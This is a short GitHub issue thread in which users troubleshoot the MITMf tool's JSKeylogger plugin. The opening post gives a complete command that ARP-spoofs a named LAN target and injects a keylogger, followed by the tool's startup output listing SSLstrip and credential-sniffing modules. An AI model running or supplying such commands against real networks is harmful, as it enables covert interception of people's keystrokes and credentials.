### ISSUE TITLE
[SOLVED] JSKEYLOGGER doesnt work

### ISSUE THREAD

**Issue by hanshass** [byt3bl33d3r/MITMf#286]
Why i cant see a Log File?  The Setup of MITMF should be correct i think......
The only Output i can see is this here

pi@kali:~$ sudo mitmf --spoof --arp -i enxb827eb6e5394 --gateway 192.168.178.1 --target 192.168.178.22 --jskeylogger                                    
███╗   ███╗██╗████████╗███╗   ███╗███████╗
████╗ ████║██║╚══██╔══╝████╗ ████║██╔════╝
██╔████╔██║██║   ██║   ██╔████╔██║█████╗
██║╚██╔╝██║██║   ██║   ██║╚██╔╝██║██╔══╝
██║ ╚═╝ ██║██║   ██║   ██║ ╚═╝ ██║██║
╚═╝     ╚═╝╚═╝   ╚═╝   ╚═╝     ╚═╝╚═╝

[*] MITMf v0.9.8 - 'The Dark Side'
|_ JSKeylogger v0.2
|_ Spoof v0.6
|  |_ ARP spoofing enabled
|
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ Net-Creds v1.0 online
|_ MITMf-API online
 * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ HTTP server online
|_ DNSChef v0.4 online
|_ SMB server online

How i can get this Tool to work as it should?
My System is a Raspberry Pi 2 with Kali Linux 2.1 installed! 
Hope someone can help!

![mitmf](https://cloud.githubusercontent.com/assets/5875379/13843698/981ee5aa-ec35-11e5-8b6c-c7c3adff3c15.png)

**Comment by hanshass** [comment]
I have solved the problem by , I just waited and did nothing .

Eventually it went by itself :)
![01](https://cloud.githubusercontent.com/assets/5875379/13898456/a53427f8-edd1-11e5-893a-3b75caec8536.png)

**Comment by byt3bl33d3r** [comment]
uhhh ok well happy you got it working.

**Comment by MihasKwstas** [comment]
Hey i have the same "problem" ... i just waiting about 6-7 minutes and nothing yet...
That is about changing from port 9999 to 4444?
